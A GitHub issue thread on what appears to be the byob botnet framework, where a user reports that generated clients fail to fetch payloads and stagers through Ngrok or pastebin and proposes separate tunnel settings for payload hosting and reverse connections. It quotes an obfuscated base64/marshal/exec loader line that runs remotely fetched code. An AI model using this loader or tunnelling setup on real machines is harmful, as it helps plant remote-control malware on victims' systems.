### ISSUE TITLE
[INCOMPATIBILITY] with Ngrok - [ERROR] with pastebin - [SUGGESTION] an option to allow user to specify the upload host and port separately

### ISSUE THREAD

**Issue by MoeR3za** [malwaredllc/byob#72]
Hello there..
First of all, I'd like to thank you for your great work on this tool.

However, though I'm not a coder, but I have noticed a couple things that can be made better.
When building a client, the host entered is the one which the payload and stager are uploaded to, but that constitutes a barrier when using a service like Ngrok..

**[INCOMPATIBILITY] with Ngrok:-**
when using Ngrok, ngrok host and port are like this (for example) `tcp://0.tcp.ngrok.io:11223 -> localhost:1234`
the client generation command would be something like `./client.py 52.15.62.13[ngrok ip] 11223`

in this case, the generator will set the payload and stager links in http://52.15.62.13:11224//file
the port here is the port I entered +1 .. which will not work because I cannot control that on ngrok.

**[ERROR] with pastebin:-**
Trying to workaround this problem by using the pastebin API, a different problem appeared..
Upon executing the payload py file, this error occures:-

> Traceback (most recent call last):
>   File "execute.py", line 1, in <module>
>     import zlib,base64,marshal,urllib,json;exec(eval(marshal.loads(zlib.decompress(base64.b64decode('THIS-IS-A-BASE64-STRING-gYCgtysnJTNIDUvkFqXka6hklJQXFVvr6BYnFJalJmXl6yfm5+kWJ5frelpYBaVkRVeqaekWpiSkamgClMhUK')))))
>   File "<string>", line 1
>     <!DOCTYPE HTML>
>     ^
> SyntaxError: invalid syntax

When I opened the link given by the Client generator in the browser, pastebin said captcha is triggered and bla bla.. I entered the captcha and all.. now links work fine in the browser, except it doesn't open a raw version of the payload/stager.
That's because the link to the raw payload/stager given by the Client Generator is something like `https://pastebin.com/raw/XXXXXX` while it should be `https://pastebin.com/raw/XXXXXX/` with a forward slash at the end.
I tried to look for the line regarding this matter to try and fix this problem, and I found it in core/payloads.py (line 819 I think), but couldn't properly fix it.

**[SUGGESTION] an option to allow user to specify Ngrok ports:-**
So, to fix the problem with the incompatibility with Ngrok, I suggest you add an option to use Ngrok [already run by the user] that will let the user specify the http host (for payload and stager) and the tcp host and port (for reverse connection) given by ngrok.
In this case the Ngrok terminal will look like this:-

> Forwarding                    http://xxxxxx.ngrok.io -> localhost:8888                                                                              
> Forwarding                    https://xxxxxx.ngrok.io -> localhost:8888                                                                             
> Forwarding                    tcp://0.tcp.ngrok.io:11223 -> localhost:1234                                                      

and the server command like this `./server.py --port 1234` just as it currently is.

so when the client is run, it will look for the payload and stager on that host given by Ngrok, and to connect back to the Ngrok host and port which will forward the connection through my local port.

I'm sorry if I couldn't explain or elaborate more than this, I did my best.. and you're the expert.

Again, thank you for your great work.

**Comment by Ekultek** [comment]
I second this a Ngrok option would be awesome

**Comment by malwaredllc** [comment]
Good idea! I will get to work implementing it as soon as I can.
